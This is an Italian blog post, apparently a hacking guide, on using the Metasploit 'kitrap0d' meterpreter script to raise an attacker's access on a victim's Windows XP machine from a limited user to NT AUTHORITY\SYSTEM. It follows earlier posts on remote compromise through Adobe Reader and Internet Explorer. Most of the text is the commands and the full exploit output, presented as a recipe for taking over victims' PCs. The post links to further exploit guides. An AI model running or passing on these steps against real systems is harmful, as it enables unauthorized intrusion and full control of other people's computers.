Avevo già parlato di questo exploit qui:
[Virtual DOS]Exploit privilege escalation windows 2000/XP/VISTA/7/SERVER
Che non fa altro che darci i privilegi system kernel da un account limitato o amministratore.
In questi giorni, ho anche parlato di altri 2 exploit:
[guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
e
[guida]Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
Questi exploit ci permettono di eseguire codice remoto sul pc della vittima e ottenere i privilegi dell’utente che sta utilizzando il programma vulnerabile (es abode reader 9.)
A questo punto, se da metasploit nella console meterpreter digitiamo:
getuid
avremo un output simile a questo:
meterpreter > getuid
Server username: WINXPSP3\user
come vedrete dall’output, vuol dire che abbiamo i privilegi dell’utente user, che potrebbe essere limitato :(
Perciò ora entra in gioco KiTrap0D che ci darà i privilegi kernel.
Digitiamo quindi dalla console meterpreter:
run kitrap0d
e avremo questo output:
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
Digitiamo ora di nuovo:
getuid
ed ecco il risultato:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Ciao buon divertimento :)
Altri:
- [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
- Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- Metasploit 3.4 and Metasploitable
